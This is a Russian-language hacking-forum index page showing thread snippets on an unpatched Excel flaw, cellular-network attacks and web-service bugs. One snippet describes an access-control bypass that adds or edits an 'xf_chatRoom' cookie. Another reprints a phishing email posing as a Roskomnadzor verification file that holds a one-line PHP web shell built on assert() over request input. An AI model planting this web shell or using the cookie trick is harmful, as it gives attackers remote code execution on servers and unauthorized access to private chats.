На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее. P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.
Вы используете устаревший браузер. Этот и другие сайты могут отображаться в нём некорректно. Вам необходимо обновить браузер или попробовать использовать другой.
На форуме изменён вывод информации о пользователях. В дальнейшем она будет дорабатываться и улучшаться.
Ниже приведено описание:
Внимание! Творческий конкурс!
В связи с этим хочу объявить бессрочный творческий конкурс, без всяких соревнований. Нужно стилизовать свою аватарку под данные...
Специалисты проекта Zero Day Initiative опубликовали информацию о неисправленной уязвимости в Microsoft Office Excel, позволяющей удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки использования после высвобождения при обработке файлов...
В паблик пока не выкладываю, надо у нас закрыть + придумать что можно из этого выжать :)
Фишка простая, нужно добавить куку xf_chatRoom или отредактировать значение на нужное нам, если список чата виден, то ID комнаты видно в списке, в противном случае подбираем.
Наткнулся на интересную статью на секлабе.
Данный отчет является логическим продолжением исследования «#root via SMS», завершенного в 2014 году командой SCADA Strangelove. Исследование затрагивало уязвимости модемов лишь частично, в рамках более широкого описания уязвимостей оборудования...
Чтобы провести атаку на абонента мобильной связи, злоумышленнику не обязательно получать доступ к инфраструктуре сотового оператора. Цели злоумышленников в большинстве случаев очевидны — получить деньги со счета, добыть информацию, вывести телефон из строя. На вебинаре мы расскажем о...
Про XSS тема есть http://webcriminal.ru/threads/script-alert-mezhsajtovyj-nezhdanchik-script.17306/
Давайте отдельно поговорим про другие баги веб сервисов. Рубрику по традиции открывает сервис от хакерокеров :) Чисто случайно на него набрел.
UXT URL Shortener -> uxt.sh
Не долго думая...
Взято с хабра.
Получил следующее письмо:
<?php
/*Подтверждение доменного имени www.site.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
assert() исполняет строку, поданную на вход.
P.S. хомячки думаю поведутся :)
Давайте поговорим о самообороне в информационном пространстве. Но перед тем как обороняться, нужно определиться от чего нужно защищаться. Вдаваться в стандарты не будем, а просто оговорим где нас может поджидать опасность. А удар, как ни странно, можно получить откуда угодно, даже не обязательно...
Мое почтение уважаемой публике. Большая уважуха спецам, которые взглянут на это-
и дадут свои комменты по этой теме. Буду очень признателен за предметный подход.